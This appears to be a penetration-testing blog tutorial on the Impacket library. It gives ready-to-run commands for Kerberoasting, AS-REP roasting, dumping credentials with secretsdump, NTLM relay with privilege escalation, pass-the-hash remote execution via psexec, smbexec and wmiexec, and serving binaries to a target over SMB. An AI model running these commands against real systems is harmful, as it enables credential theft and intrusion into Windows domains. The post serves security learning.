Impacket in Action
Introduction
In this blog post we will learn about Impacket library, and its usage during pentesting, we will also discuss some of the useful tools of this library. This post is for those who know the basics of Active Directory and Windows Administration Services. If you’re new, please do a google search if you feel uncomfortable.
Impacket
https://github.com/SecureAuthCorp/impacket.git
Clone the repo
git clone https://github.com/SecureAuthCorp/impacket.git
Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself. Packets can be constructed from scratch, as well as parsed from raw data, and the object oriented API makes it simple to work with deep hierarchies of protocols. The library provides a set of tools as examples of what can be done within the context of this library.
What protocols are featured?
- Ethernet, Linux “Cooked” capture.
- IP, TCP, UDP, ICMP, IGMP, ARP.
- IPv4 and IPv6 Support.
- NMB and SMB1, SMB2 and SMB3 (high-level implementations).
- MSRPC version 5, over different transports: TCP, SMB/TCP, SMB/NetBIOS, and HTTP.
- Plain, NTLM, and Kerberos authentications, using password/hashes/tickets/keys.
- Portions/full implementation of the following MSRPC interfaces: EPM, DTYPES, LSAD, LSAT, NRPC, RRP, SAMR, SRVS, WKST, SCMR, BKRP, DHCPM, EVEN6, MGMT, SASEC, TSCH, DCOM, WMI.
- Portions of TDS (MSSQL) and LDAP protocol implementations.
pip install -r requirements.txt
python setup.py install
You can find any of the impacket tools in ‘/impacket/examples’ file.
Explanation
addcomputer.py: Allows to add a computer to a domain using LDAP or SAMR (SMB).
addcomputer.py -method SAMR -computer-pass <PASSWORD> -computer-name <NAME> DOMAIN/USER:PASSWORD
We have added a new computer using SAMR(Security Account Manager (SAM) Remote Protocol (Client-to-Server)) to a domain.
GetUserSPNs.py: This example will try to find and fetch Service Principal Names that are associated with normal user accounts. The output is compatible with JtR and HashCat.
If we found any user accounts configured with the unconstrained delegation, we can obtain its Kerberos tickets and can try to crack that ticket.
GetUserSPNs.py DOMAIN/USER:PASSWORD -request-user <UNCONSTRAINED_USER>
GetNPUsers.py: This example will attempt to list and get TGTs for those users that have the property ‘Do not require Kerberos preauthentication’ set (UF_DONT_REQUIRE_PREAUTH). The output is compatible with JtR.
GetNPUsers.py DOMAIN/USER -dc-ip 10.10.10.161 (TargetIP)
secretdump.py Performs various techniques to dump secrets from the remote machine without executing any agent there.
secretsdump.py DOMAIN/USER:PASSWORD@<VictimIP>
secretsdump Empire/locus:brokeme@198.162.0.1
lookupsid.py: It used to enumerate local and domain users in target windows machine.
lookupsid.py user:password@<targetip>
ntlmrelayx.py: This script performs NTLM Relay Attacks, setting an SMB and HTTP Server and relaying credentials to many different protocols (SMB, HTTP, MSSQL, LDAP, IMAP, POP3, etc.). The script can be used with predefined attacks that can be triggered when a connection is relayed (e.g. create a user through LDAP) or can be executed in SOCKS mode. In this mode, for every connection relayed, it will be available to be used later on multiple times through a SOCKS proxy.
ntlmrelayx.py --escalate-user username -t ldap://DOMAIN_CONTROLLER
ntlmrelayx.py -t ldap://10.10.10.161 --escalate-user svc-alfresco
psexec.py: it is used to perform remote code execution, it executes processes on remote systems and redirects console applications’ output to the local system so that these applications appear to be running locally.
psexec.py -hashes <LM hash> domain/user@<TargetIP>
psexec.py -hashes :73ry4923rho24jr2jeor2po3j Empire/administrator@192.168.10.16 powershell.exe
smbexec.py: It focuses on using native windows functions/features for post-exploitation and expanding access on a network after you gain some credentials, whether that be a hash or password for a local or domain account. It’s similar to psexec.
smbexec.py Empire/administrator@192.168.10.16
You can also use hash.
wmiexec.py: A semi-interactive shell, used through Windows Management Instrumentation. It does not require to install any service/agent at the target server. Runs as Administrator. Highly stealthy.
wmiexec.py 'Empire/administrator@192.168.10.16'
smbserver.py: A Python implementation of an SMB server. Allows to quickly set up shares and user accounts.
smbserver.py temp /DIRECTORY/win_binaries
You have run smb server in your machine now you can share resources and also Windows utilities with the target system. To check the server
smbclient //yourIP/temp
On target system
\\10.10.14.6\temp\whoami.exe
Conclusion
We have discussed some tools with their basic usage that will help us in Exploitation and Post Exploitation phases, I recommend you to read resources I have given below
Some reference links :
https://www.secureauth.com/labs/open-source-tools/impacket
http://blog.redxorblue.com/2019/12/no-shells-required-using-impacket-to.html
https://dirkjanm.io/krbrelayx-unconstrained-delegation-abuse-toolkit/